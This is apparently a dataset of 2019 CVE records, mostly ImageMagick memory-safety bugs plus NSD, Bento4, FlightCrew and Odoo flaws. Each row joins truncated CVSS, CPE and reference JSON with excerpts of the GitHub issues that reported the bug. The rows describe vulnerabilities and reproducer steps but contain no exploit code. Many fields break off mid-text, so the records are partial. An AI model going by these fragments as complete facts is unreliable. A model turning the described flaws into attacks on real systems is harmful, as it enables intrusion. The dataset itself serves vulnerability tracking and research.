# Security Advisory - ODOO-SA-2018-08-07-5 Improper sanitization of dynamic user expressions in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated privileged users to escape from the dynamic expression sandbox and execute arbitrary code on the hosting system. **Affects**: Odo...
[SEC] ODOO-SA-2018-08-07-5 (CVE-2018-14860) - Improper sanitization of dynami...
https://api.github.com/repos/odoo/odoo/issues/32505/comments
0
2019-04-08T13:37:37Z
2019-04-08T14:38:16Z
https://github.com/odoo/odoo/issues/32505
430,456,607
32,505
481
CVE-2019-13207
2019-07-03T20:15:11.823
nsd-checkzone in NLnet Labs NSD 4.2.0 has a Stack-based Buffer Overflow in the dname_concatenate() function in dname.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NLnetLabs/nsd/issues/20" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/m...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nlnetlabs:name_server_daemon:4.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "1094EB8B-F2D4-4E0D-8984-2BE120CD8739", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "787" ]
787
https://github.com/NLnetLabs/nsd/issues/20
[ "Exploit", "Third Party Advisory" ]
github.com
[ "NLnetLabs", "nsd" ]
Hi, While fuzzing nsd-checkzone with American Fuzzy Lop, I found a Stack-based Buffer Overflow in the dname_concatenate() function, in dname.c L464. Attaching a reproducer (gzipped so GitHub accepts it), issue can be reproduced by running: nsd-checkzone all.rr zone02 [zone02.gz](https://github.com/NLnetLabs...
Stack-based Buffer Overflow in the dname_concatenate() function
https://api.github.com/repos/NLnetLabs/nsd/issues/20/comments
2
2019-06-28T12:12:53Z
2019-07-04T07:22:35Z
https://github.com/NLnetLabs/nsd/issues/20
462,005,202
20
482
CVE-2019-13238
2019-07-04T14:15:10.853
An issue was discovered in Bento4 1.5.1.0. A memory allocation failure is unhandled in Core/Ap4SdpAtom.cpp and leads to crashes. When parsing input video, the program allocates a new buffer to parse an atom in the stream. The unhandled memory allocation failure causes a direct copy to a NULL pointer.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/396" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https:...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclu...
[ "476" ]
476
https://github.com/axiomatic-systems/Bento4/issues/396
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
A memory allocation failure unhandled in Ap4SdpAtom.cpp and leads to crashes. `./mp42aac input_file /dev/null` In file Source/C++/Core/Ap4SdpAtom.cpp <img width="640" alt="image" src="https://user-images.githubusercontent.com/7632714/58334121-73c1dd80-7e71-11e9-88a2-c9fbd2129068.png"> AP4_SdpAtom allocate a n...
Exhaustive memory misunhandle
https://api.github.com/repos/axiomatic-systems/Bento4/issues/396/comments
0
2019-05-24T14:17:26Z
2019-08-25T16:31:09Z
https://github.com/axiomatic-systems/Bento4/issues/396
448,195,676
396
483
CVE-2019-13241
2019-07-04T15:15:11.280
FlightCrew v0.9.2 and older are vulnerable to a directory traversal, allowing attackers to write arbitrary files via a ../ (dot dot slash) in a ZIP archive entry that is mishandled during extraction.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Sigil-Ebook/flightcrew/issues/52" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://salvatoresecurity.com/fu...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flightcrew_project:flightcrew:*:*:*:*:*:sigil:*:*", "matchCriteriaId": "9CD25AA7-C650-4A1E-ABA6-5F189B404CC9", "versionEndExcluding": null, "versionEndIncluding": "0.9.2", "v...
[ "22" ]
22
https://github.com/Sigil-Ebook/flightcrew/issues/52
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Sigil-Ebook", "flightcrew" ]
**Summary** FlightCrew v0.9.2 and older are vulnerable to a directory traversal, allowing attackers to write arbitrary files via a ../ (dot dot slash) in a Zip archive entry that is mishandled during extraction. This vulnerability is also known as 'Zip Slip'. **Impact** This vulnerability can be used to write file...
Zip Slip Vulnerability in FlightCrew
https://api.github.com/repos/Sigil-Ebook/flightcrew/issues/52/comments
26
2019-06-26T15:23:52Z
2019-07-06T19:48:52Z
https://github.com/Sigil-Ebook/flightcrew/issues/52
461,037,201
52
484
CVE-2019-13295
2019-07-05T01:15:09.907
ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read at MagickCore/threshold.c in AdaptiveThresholdImage because a width of zero is mishandled.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https:...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "125" ]
125
https://github.com/ImageMagick/ImageMagick/issues/1608
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
heap-buffer-overflow at MagickCore/threshold.c:323:33 in AdaptiveThresholdImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1608/comments
2
2019-06-21T05:58:31Z
2019-07-08T01:48:18Z
https://github.com/ImageMagick/ImageMagick/issues/1608
459,023,037
1,608
485
CVE-2019-13296
2019-07-05T01:15:09.983
ImageMagick 7.0.8-50 Q16 has direct memory leaks in AcquireMagickMemory because of an error in CLIListOperatorImages in MagickWand/operation.c for a NULL value.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/Image...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "401" ]
401
https://github.com/ImageMagick/ImageMagick/issues/1604
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
Direct memory leaks in AcquireMagickMemory and indirect memory leaks
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1604/comments
2
2019-06-18T17:22:26Z
2019-07-08T01:48:39Z
https://github.com/ImageMagick/ImageMagick/issues/1604
457,603,906
1,604
486
CVE-2019-13297
2019-07-05T01:15:10.047
ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read at MagickCore/threshold.c in AdaptiveThresholdImage because a height of zero is mishandled.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https:...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "125" ]
125
https://github.com/ImageMagick/ImageMagick/issues/1609
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
heap-buffer-overflow at MagickCore/threshold.c:328:11 in AdaptiveThresholdImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1609/comments
2
2019-06-21T06:02:04Z
2019-07-08T01:48:56Z
https://github.com/ImageMagick/ImageMagick/issues/1609
459,024,141
1,609
487
CVE-2019-13298
2019-07-05T01:15:10.110
ImageMagick 7.0.8-50 Q16 has a heap-based buffer overflow at MagickCore/pixel-accessor.h in SetPixelViaPixelInfo because of a MagickCore/enhance.c error.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/Image...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "787" ]
787
https://github.com/ImageMagick/ImageMagick/issues/1611
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
heap-buffer-overflow at MagickCore/pixel-accessor.h:804:56 in SetPixelViaPixelInfo
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1611/comments
2
2019-06-21T06:07:48Z
2019-07-08T01:49:17Z
https://github.com/ImageMagick/ImageMagick/issues/1611
459,025,805
1,611
488
CVE-2019-13299
2019-07-05T01:15:10.187
ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read at MagickCore/pixel-accessor.h in GetPixelChannel.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/Image...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "125" ]
125
https://github.com/ImageMagick/ImageMagick/issues/1610
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
heap-buffer-overflow at MagickCore/pixel-accessor.h:116:10 in GetPixelChannel
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1610/comments
6
2019-06-21T06:05:24Z
2019-10-25T13:50:32Z
https://github.com/ImageMagick/ImageMagick/issues/1610
459,025,122
1,610
489
CVE-2019-13300
2019-07-05T01:15:10.250
ImageMagick 7.0.8-50 Q16 has a heap-based buffer overflow at MagickCore/statistic.c in EvaluateImages because of mishandling columns.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/Image...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "787" ]
787
https://github.com/ImageMagick/ImageMagick/issues/1586
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
heap-buffer-overflow in MagickCore/statistic.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1586/comments
3
2019-06-10T15:57:48Z
2019-07-08T01:49:56Z
https://github.com/ImageMagick/ImageMagick/issues/1586
454,242,285
1,586
490
CVE-2019-13301
2019-07-05T01:15:10.297
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/Image...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "401" ]
401
https://github.com/ImageMagick/ImageMagick/issues/1585
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
memory leaks in AcquireMagickMemory of MagickCore/memory.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1585/comments
5
2019-06-10T14:34:22Z
2019-10-05T02:53:40Z
https://github.com/ImageMagick/ImageMagick/issues/1585
454,202,041
1,585
491
CVE-2019-13301
2019-07-05T01:15:10.297
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/Image...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "401" ]
401
https://github.com/ImageMagick/ImageMagick/issues/1589
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
heap-use-after-free in MagickCore/resize.c and double-free in RelinquishAlignedMemory of MagickCore/memory.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1589/comments
11
2019-06-11T05:31:32Z
2019-07-09T13:21:32Z
https://github.com/ImageMagick/ImageMagick/issues/1589
454,487,713
1,589
492
CVE-2019-13302
2019-07-05T01:15:10.373
ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read in MagickCore/fourier.c in ComplexImages.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/Image...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "125" ]
125
https://github.com/ImageMagick/ImageMagick/issues/1597
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
heap-buffer-overflow in MagickCore/fourier.c:305:45 in ComplexImages
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1597/comments
2
2019-06-17T03:51:17Z
2019-07-08T01:50:56Z
https://github.com/ImageMagick/ImageMagick/issues/1597
456,730,033
1,597
493
CVE-2019-13303
2019-07-05T01:15:10.437
ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read in MagickCore/composite.c in CompositeImage.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/d29148fa...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "125" ]
125
https://github.com/ImageMagick/ImageMagick/issues/1603
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
heap-buffer-overflow in MagickCore/composite.c:666:45 in CompositeImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1603/comments
2
2019-06-18T17:08:25Z
2019-07-08T01:51:18Z
https://github.com/ImageMagick/ImageMagick/issues/1603
457,598,033
1,603
494
CVE-2019-13304
2019-07-05T01:15:10.500
ImageMagick 7.0.8-50 Q16 has a stack-based buffer overflow at coders/pnm.c in WritePNMImage because of a misplaced assignment.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/Image...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "787" ]
787
https://github.com/ImageMagick/ImageMagick/issues/1614
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
stack-buffer-overflow at coders/pnm.c:1762 in WritePNMImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1614/comments
4
2019-06-21T06:36:50Z
2019-08-10T11:27:40Z
https://github.com/ImageMagick/ImageMagick/issues/1614
459,035,202
1,614
495
CVE-2019-13307
2019-07-05T01:15:10.687
ImageMagick 7.0.8-50 Q16 has a heap-based buffer overflow at MagickCore/statistic.c in EvaluateImages because of mishandling rows.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/Image...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "787" ]
787
https://github.com/ImageMagick/ImageMagick/issues/1615
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
heap-buffer-overflow at MagickCore/statistic.c:559:43 in EvaluateImages
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1615/comments
6
2019-06-22T02:11:22Z
2019-08-10T11:30:08Z
https://github.com/ImageMagick/ImageMagick/issues/1615
459,421,750
1,615
498
CVE-2019-13308
2019-07-05T01:15:10.750
ImageMagick 7.0.8-50 Q16 has a heap-based buffer overflow in MagickCore/fourier.c in ComplexImage.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/61135001...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "787" ]
787
https://github.com/ImageMagick/ImageMagick/issues/1595
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
heap-buffer-overflow in MagickCore/fourier.c:299:18 in ComplexImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1595/comments
3
2019-06-17T02:21:01Z
2019-08-13T11:59:01Z
https://github.com/ImageMagick/ImageMagick/issues/1595
456,713,579
1,595
499
CVE-2019-13309
2019-07-05T01:15:10.813
ImageMagick 7.0.8-50 Q16 has memory leaks at AcquireMagickMemory because of mishandling the NoSuchImage error in CLIListOperatorImages in MagickWand/operation.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/ImageMagick/Image...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "401" ]
401
https://github.com/ImageMagick/ImageMagick/issues/1616
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
memory leaks is detected at AcquireMagickMemory
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1616/comments
2
2019-06-23T08:45:54Z
2019-07-08T01:55:00Z
https://github.com/ImageMagick/ImageMagick/issues/1616
459,551,673
1,616
500
CVE-2019-13311
2019-07-05T01:15:10.937
ImageMagick 7.0.8-50 Q16 has memory leaks at AcquireMagickMemory because of a wand/mogrify.c error.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
